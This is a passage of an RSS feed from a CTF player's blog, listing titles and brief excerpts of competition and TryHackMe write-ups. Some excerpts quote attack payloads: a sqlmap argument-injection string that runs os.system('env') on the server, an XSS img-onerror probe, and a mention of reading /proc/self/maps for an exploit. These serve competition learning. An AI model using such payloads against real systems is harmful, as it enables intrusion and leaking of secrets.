isPermaLink="false">/archives/d3ctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Mon, 2 Jun 2025 07:06:46 GMT</pubDate></item><item><title><![CDATA[tryhackme靶场之Frosteau Busy with Vim wp]]></title><link>https://enoch.host/archives/frosteau-busy-with-vim-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=tryhackme%E9%9D%B6%E5%9C%BA%E4%B9%8BFrosteau%20Busy%20with%20Vim%20wp&amp;url=/archives/frosteau-busy-with-vim-wp" width="1" height="1" alt="" style="opacity:0;">这个靶场质量不错 扫端口]]></description><guid isPermaLink="false">/archives/frosteau-busy-with-vim-wp</guid><dc:creator>ENOCH</dc:creator><category>tryhackme</category><pubDate>Mon, 19 May 2025 13:44:57 GMT</pubDate></item><item><title><![CDATA[midnight sun ctf 2025 wp]]></title><link>https://enoch.host/archives/midnight-sun-ctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=midnight%20sun%20ctf%202025%20wp&amp;url=/archives/midnight-sun-ctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">web shot host 给了一个上传存储桶的网页 大致逻辑 function fread(file) { return new Promise((resolve) =&gt; { const reader = new FileReader(); reader.o]]></description><guid isPermaLink="false">/archives/midnight-sun-ctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 18 May 2025 12:28:18 GMT</pubDate></item><item><title><![CDATA[parloo杯2025 wp]]></title><link>https://enoch.host/archives/parloo-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=parloo%E6%9D%AF2025%20wp&amp;url=/archives/parloo-2025-wp" width="1" height="1" alt="" style="opacity:0;">逆向 xor c="qcoq~Vh{e~bccocH^@Lgt{gt|g" j=1 for i in c: &nbsp; &nbsp; &nbsp; print(chr(ord(i)^j),end="") &nbsp; &nbsp; &nbsp; j+=1 gogogo for a3 in range(256): &nbsp; encrypted = []]></description><guid isPermaLink="false">/archives/parloo-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 18 May 2025 11:44:36 GMT</pubDate></item><item><title><![CDATA[tryhackme靶场之Jurassic Park]]></title><link>https://enoch.host/archives/tryhackme-Jurassic-Park</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=tryhackme%E9%9D%B6%E5%9C%BA%E4%B9%8BJurassic%20Park&amp;url=/archives/tryhackme-Jurassic-Park" width="1" height="1" alt="" style="opacity:0;">nmap nmap一下，只发现22和80 sql 进入item.php似乎参数id能被注入 测试发现当id为123有内容，其他返回no result但是id=5会返回 Dennis, why have]]></description><guid isPermaLink="false">/archives/tryhackme-Jurassic-Park</guid><dc:creator>ENOCH</dc:creator><category>tryhackme</category><pubDate>Tue, 13 May 2025 12:52:01 GMT</pubDate></item><item><title><![CDATA[御网杯2025 wp by ENOCH]]></title><link>https://enoch.host/archives/hncsisc-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E5%BE%A1%E7%BD%91%E6%9D%AF2025%20wp%20by%20ENOCH&amp;url=/archives/hncsisc-2025-wp" width="1" height="1" alt="" style="opacity:0;">最后得分2240 全国排名大概在七百多的样子 web YWB_Web_xff if ($_SERVER["REQUEST_METHOD"] == "POST") { $cip = $_SERVER["HTTP_X_FORWARDED_FOR"]]]></description><guid isPermaLink="false">/archives/hncsisc-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 11 May 2025 09:35:22 GMT</pubDate></item><item><title><![CDATA[tryhackme靶场之Rabbit Hole]]></title><link>https://enoch.host/archives/tryhackme-rabbit-hole</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=tryhackme%E9%9D%B6%E5%9C%BA%E4%B9%8BRabbit%20Hole&amp;url=/archives/tryhackme-rabbit-hole" width="1" height="1" alt="" style="opacity:0;">最近买了tryhackme的会员，试着刷刷渗透靶场（虽说这个兔子洞不需要会员也能刷） 信息收集 nmap开扫 nmap -sC -sV -oN nmap/initial 10.10.192.187 -v 只开了两个端口，ssh和http http服务只有注册登]]></description><guid isPermaLink="false">/archives/tryhackme-rabbit-hole</guid><dc:creator>ENOCH</dc:creator><category>tryhackme</category><pubDate>Wed, 7 May 2025 14:22:00 GMT</pubDate></item><item><title><![CDATA[蓝桥杯2025 wp]]></title><link>https://enoch.host/archives/lanqiaobei2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E8%93%9D%E6%A1%A5%E6%9D%AF2025%20wp&amp;url=/archives/lanqiaobei2025-wp" width="1" height="1" alt="" style="opacity:0;">flowzip 一把梭了 enigma 给的是赛博厨子，那用赛博厨子解密即可]]></description><guid isPermaLink="false">/archives/lanqiaobei2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sat, 26 Apr 2025 10:33:12 GMT</pubDate></item><item><title><![CDATA[YNUCTF2025 wp]]></title><link>https://enoch.host/archives/ynuctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=YNUCTF2025%20wp&amp;url=/archives/ynuctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">云南大学校赛，最终成绩如下 也是体验一次ak了web的感觉 misc（AK！） 随波逐流一把梭，misc基本都能秒 sign1]]></description><guid isPermaLink="false">/archives/ynuctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Fri, 18 Apr 2025 06:29:11 GMT</pubDate></item><item><title><![CDATA[HackTricks学习记录]]></title><link>https://enoch.host/archives/hacktricks-study</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HackTricks%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95&amp;url=/archives/hacktricks-study" width="1" height="1" alt="" style="opacity:0;">最近打校赛，搜索资料的时候看到了HackTricks 感觉里面的很多tricks很有价值，于是记录一下学习的过程 HackTricks - HackTricks unicode问题]]></description><guid isPermaLink="false">/archives/hacktricks-study</guid><dc:creator>ENOCH</dc:creator><category>文章</category><pubDate>Thu, 17 Apr 2025 13:59:20 GMT</pubDate></item><item><title><![CDATA[codegate wp]]></title><link>https://enoch.host/archives/codegate-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=codegate%20wp&amp;url=/archives/codegate-wp" width="1" height="1" alt="" style="opacity:0;">Masquerade 几个人一起解出来的,三个人一起才写出一题 只能说，国际赛确实难 wp有点乱。。。反正核心考点是：js的toUpperCase加相对路径绕过加domClobbering const { generateToken } = require("../utils/jwt"); cons]]></description><guid isPermaLink="false">/archives/codegate-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 30 Mar 2025 06:16:06 GMT</pubDate></item><item><title><![CDATA[推荐一个云服务商——DK盾]]></title><link>https://enoch.host/archives/ads-for-dkdun</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E6%8E%A8%E8%8D%90%E4%B8%80%E4%B8%AA%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%95%86%E2%80%94%E2%80%94DK%E7%9B%BE&amp;url=/archives/ads-for-dkdun" width="1" height="1" alt="" style="opacity:0;">之前加入了DK盾的QQ群，看到里面有不少不错的产品，苦于囊中羞涩，还在用着阿里云的99一年的服务器 但是！DK盾竟然有CTFer赞助计划！ 所以来推荐一下（赛博乞讨 官网https://www.dkdun.cn/ QQ群是：727077055 后续： 拿到了一个4c4g的香港服务器 感谢DK]]></description><guid isPermaLink="false">/archives/ads-for-dkdun</guid><dc:creator>ENOCH</dc:creator><pubDate>Thu, 27 Mar 2025 06:23:42 GMT</pubDate></item><item><title><![CDATA[NCTF2025]]></title><link>https://enoch.host/archives/nctf2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=NCTF2025&amp;url=/archives/nctf2025" width="1" height="1" alt="" style="opacity:0;">ENOCH个人wp 一个人打，最终总榜24名 sqlmap 经过反复测试最终得到payload http://127.0.0.1/?a=1 -eval=os=__import__('os');a=os.system('env') -v 6 eval可以执行python脚本，由于命令会被分割，选择os]]></description><guid isPermaLink="false">/archives/nctf2025</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 23 Mar 2025 13:47:00 GMT</pubDate></item><item><title><![CDATA[记第一次长城杯线下赛]]></title><link>https://enoch.host/archives/first-ciscn-offline-competition</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E8%AE%B0%E7%AC%AC%E4%B8%80%E6%AC%A1%E9%95%BF%E5%9F%8E%E6%9D%AF%E7%BA%BF%E4%B8%8B%E8%B5%9B&amp;url=/archives/first-ciscn-offline-competition" width="1" height="1" alt="" style="opacity:0;">周六，本来跟着nu1l junior在打一个国际的小比赛，结果下午四点突然FFreestanding学长跟我说要我飞去成都，打长城杯线下赛 很懵逼，因为理论上名单里不应该有我，但是他们签到时发现我在名单里面确定可以去打之后，连忙定了一张飞机票飞去成都（比赛是第二天的9点，只能飞过去了），到酒店之后，]]></description><guid isPermaLink="false">/archives/first-ciscn-offline-competition</guid><dc:creator>ENOCH</dc:creator><enclosure url="https://enoch.host/apis/api.storage.halo.run/v1alpha1/thumbnails/-/via-uri?uri=%2Fupload%2F7bb5670aebe658644d0b24eed0a54194.jpg&amp;size=m" type="image/jpeg" length="106730"/><category>记录</category><pubDate>Tue, 18 Mar 2025 05:38:45 GMT</pubDate></item><item><title><![CDATA[TPCTF2025 wp]]></title><link>https://enoch.host/archives/tpctf2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=TPCTF2025%20wp&amp;url=/archives/tpctf2025-wp" width="1" height="1" alt="" style="opacity:0;">misc签到 TPCTF{w3LCOMe_70_tpcTF_2025_H0Pe_Y0u_HavE_fun!!} baby layout layout系列有三题 第一题是常规Dompurify 提交&lt;img src=x onerror=""&gt;会把onerror删掉 但是这题要求提交一个layout，一]]></description><guid isPermaLink="false">/archives/tpctf2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Thu, 13 Mar 2025 00:26:22 GMT</pubDate></item><item><title><![CDATA[阿里云赛后wp]]></title><link>https://enoch.host/archives/alyun-ctf-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E9%98%BF%E9%87%8C%E4%BA%91%E8%B5%9B%E5%90%8Ewp&amp;url=/archives/alyun-ctf-wp" width="1" height="1" alt="" style="opacity:0;">赛后wp，因为那两天回校，没时间写，只是看了眼题目就要走了 虽说感觉写了可能也写不出来 ezoj /source 查看源码 import os import subprocess import uuid import json from flask import Flask, request, js]]></description><guid isPermaLink="false">/archives/alyun-ctf-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sat, 1 Mar 2025 02:03:52 GMT</pubDate></item><item><title><![CDATA[VN ctf 2025 web]]></title><link>https://enoch.host/archives/vn-ctf-2025-web</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=VN%20ctf%202025%20web&amp;url=/archives/vn-ctf-2025-web" width="1" height="1" alt="" style="opacity:0;">VN_Long 只需要最朴素的解法]]></description><guid isPermaLink="false">/archives/vn-ctf-2025-web</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sat, 15 Feb 2025 22:24:09 GMT</pubDate></item><item><title><![CDATA[nu1l junior 2025 部分web]]></title><link>https://enoch.host/archives/nu1l-junior-2025-web-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=nu1l%20junior%202025%20%E9%83%A8%E5%88%86web&amp;url=/archives/nu1l-junior-2025-web-wp" width="1" height="1" alt="" style="opacity:0;">一共写出来3道题目，剩下两题其实也很接近，只是分别因为对Java和csp不熟悉导致最终没写出来，哎 Gavatar upload.php传入url，有任意文件读取，flag没权限 想到一个缓冲区溢出的cve，复现一遍就行 读取/proc/self/maps和libc.so.6，放在本地，运行修改后的]]></description><guid isPermaLink="false">/archives/nu1l-junior-2025-web-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Fri, 14 Feb 2025 03:33:24 GMT</pubDate></item></channel></rss>